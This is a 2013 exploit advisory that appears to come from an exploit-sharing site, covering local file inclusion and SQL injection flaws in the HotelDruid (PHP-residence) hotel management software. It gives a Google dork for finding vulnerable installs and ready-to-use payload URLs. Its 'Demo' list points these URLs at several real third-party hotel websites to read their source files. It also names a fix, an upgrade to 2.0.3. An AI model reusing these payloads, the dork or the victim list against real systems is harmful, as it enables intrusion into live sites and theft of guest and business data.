facebook facebook twitter rss

Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities

Author: TUNISIAN CYBER , Published: 14-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities
[+] Date: 14-12-2013
[+] Category: WebApp
[+] Vendor: http://www.hoteldruid.com/en/download.html
[+] Google Dork: inurl:"mostra_sorgente.php"
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################
Description:
Hoteldruid is an open source program for hotel management (property management software) suffers from Local File Inclusion and SQL injection

I/LFI:
http://127.0.0.1/php-residence/mostra_sorgente.php?file_sorgente=[FILE]

II/SQLi:
http://127.0.0.1/php-residence/creaprezzi.php?anno=[YEAR]'
http://127.0.0.1/php-residence/messaggi.php?id_sessione=&anno=[YEAR]'

Fix:
Upgrade to v2.0.3
Demo:

http://www.hoteldruid.com/demo/mostra_sorgente.php?file_sorgente=clienti.php(vendor site)
https://lodginginspirational.com/mostra_sorgente.php?file_sorgente=clienti.php
http://www.at184.com/availability/mostra_sorgente.php?file_sorgente=/
http://www.pantelleriaest.com/hoteldruid/mostra_sorgente.php?file_sorgente=crea_backup.php
http://tbg.evolve2.org/mostra_sorgente.php?file_sorgente=themes/snj/php/menu.php
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt,Exploit4arab Team

Like us on Facebook :